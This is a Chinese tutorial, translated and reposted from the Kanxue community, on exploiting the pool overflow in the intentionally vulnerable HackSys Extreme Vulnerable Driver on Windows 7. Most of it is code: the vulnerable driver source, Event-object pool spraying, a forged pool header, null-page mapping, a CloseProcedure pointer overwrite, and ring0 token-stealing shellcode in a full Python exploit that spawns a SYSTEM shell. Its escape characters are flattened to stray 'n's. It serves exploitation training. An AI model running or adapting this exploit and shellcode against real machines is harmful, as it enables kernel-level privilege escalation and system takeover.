Windows内核使用教程4池风水->池溢出

前言

这一系列文章源于作者学习HackSystem开设课程--windows 内核利用训练课程的学习笔记，到目前为止作者已发布4篇：

1.环境搭建
2.栈溢出
3.任意内存覆盖
4.池溢出

概要

我们已经在上一章探讨了任意内存覆盖漏洞,在本章我们讨论另一个漏洞，池溢出。简单来说，就是池缓冲区的越界。这部分可能会比较难，我们将深入探讨如何通过修改池，从而控制应用程序流，确保每次都可靠地指向我们的shellcode地址。所以花点时间好好理解我之前文章中的概念，之后再来尝试利用本文中的漏洞。

再次感谢hacksysteam的驱动程序。

池风水

在我们深入探讨池溢出这个主题前, 我们需要先了解下池的基本概念, 如何根据需要操纵它。 Tarjei Mandt写了一篇很好的关于这个主题的文章,强烈建议在继续阅读本文前先浏览Tarjei Mandt 的文章，因为你需要对池概念有一个扎实的理解。

内核池类似于Windows 中的堆, 因为它的作用也是用来动态分配内存。 就像堆喷修改正常应用程序的堆一样，我们需要在内核领域找到一种办法来修改内存池，以便在内存区域精确地调用我们的shellcode。 理解内存分配器的概念以及如何影响池分配和释放机制相当重要。

至于我们的 HEVD 驱动, 有漏洞的用户缓冲区被分配在非分页池，所以我们需要找到一种方法来修改非分页池。 Windows 提供了一种Event对象, 该对象存储在非分页池中，可以使用CreateEvent API 来创建：

HANDLE WINAPI CreateEvent(n_In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes,n_In_ BOOL bManualReset,n_In_ BOOL bInitialState,n_In_opt_ LPCTSTR lpNamen);

在这里我们需要用这个API创建两个足够大的Event对象数组，然后通过使用CloseHandle API 释放某些Event 对象，从而在分配的池块中造成空隙，经合并形成更大的空闲块:

BOOL WINAPI CloseHandle(n_In_ HANDLE hObjectn);

在这些空闲块中，我们需要将有漏洞的用户缓冲区插进去，以便每次准确地覆盖正确的内存位置。因为我们会破坏Event对象的相邻头部，以便跳转到包含shellcode的地址。下面用一个粗略的图表来展示下我们正要做的工作:

在这之后，我们会把指针指向shellcode，这样就可以通过操纵损坏的池头部来调用它。 我们伪造一个OBJECT_TYPE头，覆盖指向OBJECT_TYPE_INITIALIZER中的一个过程的指针。

分析

为了便于分析漏洞, 先看下PoolOverflow.c 文件:

__try {nDbgPrint("[+] Allocating Pool chunkn");n// 分配池块nKernelBuffer = ExAllocatePoolWithTag(NonPagedPool,n(SIZE_T)POOL_BUFFER_SIZE,n(ULONG)POOL_TAG);nif (!KernelBuffer) {n// Unable to allocate Pool chunknDbgPrint("[-] Unable to allocate Pool chunkn");nStatus = STATUS_NO_MEMORY;nreturn Status;n}nelse {nDbgPrint("[+] Pool Tag: %sn", STRINGIFY(POOL_TAG));nDbgPrint("[+] Pool Type: %sn", STRINGIFY(NonPagedPool));nDbgPrint("[+] Pool Size: 0x%Xn", (SIZE_T)POOL_BUFFER_SIZE);nDbgPrint("[+] Pool Chunk: 0x%pn", KernelBuffer);n}n// 验证缓冲区是否驻留在用户模式下nProbeForRead(UserBuffer, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)__alignof(UCHAR));nDbgPrint("[+] UserBuffer: 0x%pn", UserBuffer);nDbgPrint("[+] UserBuffer Size: 0x%Xn", Size);nDbgPrint("[+] KernelBuffer: 0x%pn", KernelBuffer);nDbgPrint("[+] KernelBuffer Size: 0x%Xn", (SIZE_T)POOL_BUFFER_SIZE);nn#ifdef SECURE nn// 安全注意: 因为开发者传递的size大小 等同于 RtlCopyMemory()/memcpy()分配的池块大小，所以是安全的，因此没有溢出。nRtlCopyMemory(KernelBuffer, UserBuffer, (SIZE_T)POOL_BUFFER_SIZE);nn#elsenDbgPrint("[+] Triggering Pool Overflown");n// 漏洞注意：这是一个基于池的溢出n// 因为没有检查开发者传递的size大小 是否大于或者等于 RtlCopyMemory()/memcpy()分配的池块大小，所以是安全的，因此没有溢出nnRtlCopyMemory(KernelBuffer, UserBuffer, Size);

似乎看起来有点复杂，但是这里的漏洞很明显，在最后一行开发人员直接传递值而没有验证大小，这导致了一个基于池的溢出漏洞。

我们将按照上一篇文章中的描述找到这个漏洞的IOCTL号：

hex((0x00000022 << 16) | (0x00000000 << 14) | (0x803 << 2) | 0x00000003)

计算得出 IOCTL 为 0x22200f。

用IDA分析一下驱动中的 TriggerPoolOverflow 函数：

我们用标签“Hack”指代有漏洞的缓冲区标记，长度为0x1f8（504）。由于现在有足够的关于漏洞的信息，让我们直接跳到有趣的部分，利用它。

利用

让我们从基本的框架开始, IOCTL 为 0x22200f。

import ctypes, sys, structnfrom ctypes import *nfrom subprocess import *nndef main():nkernel32 = windll.kernel32npsapi = windll.Psapinntdll = windll.ntdllnhevDevice = kernel32.CreateFileA(".HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)nnif not hevDevice or hevDevice == -1:nprint "*** Couldn't get Device Driver handle"nsys.exit(-1)nnbuf = "A"*100nbufLength = len(buf)nnkernel32.DeviceIoControl(hevDevice, 0x22200f, buf, bufLength, None, 0, byref(c_ulong()), None)nnif __name__ == "__main__":nmain()

我们正在触发池溢出IOCTL，可以看到标签“Hack”，大小为0x1f8（504），尝试下赋给UserBuffer 0x1f8个字节的大小。

我们现在不应该破坏相邻的内存块，因为现在UserBuffer的值为边界值，来分析一下池：

可以看到用户缓冲区被完美地分配了，结束地址为下一个池块起始地址：

溢出会是灾难性的，并且将直接导致系统蓝屏崩溃，破坏了相邻的池块头部。

在这里很有趣的一件事是，我们如何能够通过溢出控制相邻的头部。我们利用的这个漏洞可以以修改池的方式来使得池不再随机化。那么我此前讨论的 CreateEvent API 可以胜任这个工作，它的大小为0x40个字节，正好可以匹配池的大小0x200个字节。

我们会喷射大量Event对象，把它们的句柄存储在数组中，看下如何影响我们的池：

import ctypes, sys, structnfrom ctypes import *nfrom subprocess import *nndef main():nkernel32 = windll.kernel32nntdll = windll.ntdllnnhevDevice = kernel32.CreateFileA(".HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)nnif not hevDevice or hevDevice == -1:nprint "*** Couldn't get Device Driver handle."nsys.exit(0)nnbuf = "A"*504nbuf_ad = id(buf) + 20nnspray_event1 = spray_event2 = []nnfor i in xrange(10000):nspray_event1.append(kernel32.CreateEventA(None, False, False, None))nfor i in xrange(5000):nspray_event2.append(kernel32.CreateEventA(None, False, False, None))nnkernel32.DeviceIoControl(hevDevice, 0x22200f, buf_ad, len(buf), None, 0, byref(c_ulong()), None)nnif __name__ == "__main__":nmain()

我们的Event对象被喷射到非分页池中，现在我们需要在这些内存块创造一些空隙，然后把我们有漏洞的Hack缓冲区重新分配到这些空隙中。在重新分配有漏洞的缓冲区后，我们需要破坏相邻的池头部，以指向我们的shellcode地址。Event对象的大小为0x40个字节（0x38+0x8），包括池头部。

来分析一下头部：

由于Event对象被喷射到非分页池中，所以我们可以将这些值加到缓冲区末尾，来实现利用。但是，简单这样做是行不通的，我们来研究下头部的数据结构，再稍作修改：

我们感兴趣的部分是TypeIndex ，它实际上是指针数组中的偏移量大小，它定义了Windows所支持的每个对象的OBJECT_TYPE，来分析一下：

这看起来可能有点复杂，但我已经标记出了重要的部分：

• 第一个指针是 00000000，在Windows 7下非常重要（下面解释）；
• 下一个突出显示的指针是 85f05418， 这是从0xc开始的偏移量；
• 分析到这，可以看出这是Event对象类型；
• 现在最有趣的是偏移量0x28 处的TypeInfo成员：
• 这个成员的最后部分有一些程序调用，我们可以从提供的程序中挑选以供己用，在这选择0x038处的 CloseProcedure
• CloseProcedure 的偏移量为 0x28 + 0x38 = 0x60
• 我们会覆盖0x60处的这个指针，让它指向我们的shellcode地址，然后调用CloseProcedure方法，从而最终执行我们的shellcode。

我们的目标是把TypeIndex的偏移量从0xc改为0x0，因为第一个指针是空指针，在Windows 7 中有一个漏洞，可以调用 NtAllocateVirtualMemory来映射到Null页面：

NTSTATUS ZwAllocateVirtualMemory(n_In_ HANDLE ProcessHandle,n_Inout_ PVOID *BaseAddress,n_In_ ULONG_PTR ZeroBits,n_Inout_ PSIZE_T RegionSize,n_In_ ULONG AllocationType,n_In_ ULONG Protectn);

然后调用WriteProcessMemory 覆盖0x60处的指针，指向shellcode地址:

BOOL WINAPI WriteProcessMemory(n_In_ HANDLE hProcess,n_In_ LPVOID lpBaseAddress,n_In_ LPCVOID lpBuffer,n_In_ SIZE_T nSize,n_Out_ SIZE_T *lpNumberOfBytesWrittenn);

把所有的内容整合一下，python脚本大体如下：

import ctypes, sys, structnfrom ctypes import *nfrom subprocess import *nndef main():nkernel32 = windll.kernel32nntdll = windll.ntdllnnhevDevice = kernel32.CreateFileA(".HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)nnif not hevDevice or hevDevice == -1:nprint "*** Couldn't get Device Driver handle."nsys.exit(0)nnntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(c_void_p(0x1)), 0, byref(c_ulong(0x100)), 0x3000, 0x40)nnshellcode = "x90" * 8nshellcode_address = id(shellcode) + 20nnkernel32.WriteProcessMemory(0xFFFFFFFF, 0x60, byref(c_void_p(shellcode_address)), 0x4, byref(c_ulong()))nnbuf = "A" * 504nbuf += struct.pack("L", 0x04080040)nbuf += struct.pack("L", 0xEE657645)nbuf += struct.pack("L", 0x00000000)nbuf += struct.pack("L", 0x00000040)nbuf += struct.pack("L", 0x00000000)nbuf += struct.pack("L", 0x00000000)nbuf += struct.pack("L", 0x00000001)nbuf += struct.pack("L", 0x00000001)nbuf += struct.pack("L", 0x00000000)nbuf += struct.pack("L", 0x00080000)nbuf_ad = id(buf) + 20nnspray_event1 = spray_event2 = []nnfor i in xrange(10000):nspray_event1.append(kernel32.CreateEventA(None, False, False, None))nfor i in xrange(5000):nspray_event2.append(kernel32.CreateEventA(None, False, False, None))nnfor i in xrange(0, len(spray_event2), 16):nfor j in xrange(0, 8, 1):nkernel32.CloseHandle(spray_event2[i+j])nnkernel32.DeviceIoControl(hevDevice, 0x22200f, buf_ad, len(buf), None, 0, byref(c_ulong()), None)nnif __name__ == "__main__":nmain()

有漏洞的缓冲区现在位于我们创建的Event对象之间的空隙中。

TypeIndex由 0xc 修改为 0x0

shellcode地址布置完成！

现在，只需要调用 Closeprocedure，在 虚拟内存中 加载shellcode， shellcode应该完美运行。最终版本的exploit如下：

import ctypes, sys, structnfrom ctypes import *nfrom subprocess import *nndef main():nkernel32 = windll.kernel32nntdll = windll.ntdllnnhevDevice = kernel32.CreateFileA(".HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)nnif not hevDevice or hevDevice == -1:nprint "*** Couldn't get Device Driver handle."nsys.exit(0)nn#定义 ring0级的shellcode ， 加载.nshellcode = bytearray(n"x90x90x90x90" # NOP Sledn"x60" # pushadn"x64xA1x24x01x00x00" # mov eax, fs:[KTHREAD_OFFSET]n"x8Bx40x50" # mov eax, [eax + EPROCESS_OFFSET]n"x89xC1" # mov ecx, eax (Current _EPROCESS structure)n"x8Bx98xF8x00x00x00" # mov ebx, [eax + TOKEN_OFFSET]n"xBAx04x00x00x00" # mov edx, 4 (SYSTEM PID)n"x8Bx80xB8x00x00x00" # mov eax, [eax + FLINK_OFFSET]n"x2DxB8x00x00x00" # sub eax, FLINK_OFFSETn"x39x90xB4x00x00x00" # cmp [eax + PID_OFFSET], edxn"x75xED" # jnzn"x8Bx90xF8x00x00x00" # mov edx, [eax + TOKEN_OFFSET]n"x89x91xF8x00x00x00" # mov [ecx + TOKEN_OFFSET], edxn"x61" # popadn"xC2x10x00" # ret 16n)nnptr = kernel32.VirtualAlloc(c_int(0), c_int(len(shellcode)), c_int(0x3000),c_int(0x40))nbuff = (c_char * len(shellcode)).from_buffer(shellcode)nkernel32.RtlMoveMemory(c_int(ptr), buff, c_int(len(shellcode)))nnprint "[+] Pointer for ring0 shellcode: {0}".format(hex(ptr))nn#分配Null页面，虚拟内存地址: 0x0000 - 0x1000n#基址为0x1n#分配0x100（256）个字节大小的内存块nnprint "n[+] Allocating/Mapping NULL page..."nnnull_status = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(c_void_p(0x1)), 0, byref(c_ulong(0x100)), 0x3000, 0x40)nif null_status != 0x0:nprint "t[+] Failed to allocate NULL page..."nsys.exit(-1)nelse:nprint "t[+] NULL Page Allocated"nn#将 ring0级 指针写入Null 页面，为了调用CloseProcedure @ 0x60nnprint "n[+] Writing ring0 pointer {0} in location 0x60...".format(hex(ptr))nif not kernel32.WriteProcessMemory(0xFFFFFFFF, 0x60, byref(c_void_p(ptr)), 0x4, byref(c_ulong())):nprint "t[+] Failed to write at 0x60 location"nsys.exit(-1)nn#定义用户缓冲区n#长度大小 0x1f8 (504), 破坏相邻池头部指向Null 页面nnbuf = "A" * 504nbuf += struct.pack("L", 0x04080040)nbuf += struct.pack("L", 0xEE657645)nbuf += struct.pack("L", 0x00000000)nbuf += struct.pack("L", 0x00000040)nbuf += struct.pack("L", 0x00000000)nbuf += struct.pack("L", 0x00000000)nbuf += struct.pack("L", 0x00000001)nbuf += struct.pack("L", 0x00000001)nbuf += struct.pack("L", 0x00000000)nbuf += struct.pack("L", 0x00080000)nnbuf_ad = id(buf) + 20nn#将Event对象喷射到非分页池，创造两个足够大的（10000和 5000）的块。nnspray_event1 = spray_event2 = []nnprint "n[+] Spraying Non-Paged Pool with Event Objects..."nnfor i in xrange(10000):nspray_event1.append(kernel32.CreateEventA(None, False, False, None))nprint "t[+] Sprayed 10000 objects."nnfor i in xrange(5000):nspray_event2.append(kernel32.CreateEventA(None, False, False, None))nprint "t[+] Sprayed 5000 objects."nn#在喷射区域造成空洞，以便将用户缓冲区分配到该地址nnprint "n[+] Creating holes in the sprayed region..."nnfor i in xrange(0, len(spray_event2), 16):nfor j in xrange(0, 8, 1):nkernel32.CloseHandle(spray_event2[i+j])nnkernel32.DeviceIoControl(hevDevice, 0x22200f, buf_ad, len(buf), None, 0, byref(c_ulong()), None)nn#通过释放Event 对象 关闭句柄，最终执行shellcodennprint "n[+] Calling the CloseProcedure..."nnfor i in xrange(0, len(spray_event1)):nkernel32.CloseHandle(spray_event1[i])nnfor i in xrange(8, len(spray_event2), 16):nfor j in xrange(0, 8, 1):nkernel32.CloseHandle(spray_event2[i + j])nnprint "n[+] nt authoritysystem shell incoming"nPopen("start cmd", shell=True)nnif __name__ == "__main__":nmain()

得到系统管理员权限：

本文由看雪翻译小组 fyb波 编译，来源rootkits 转载请注明来自看雪社区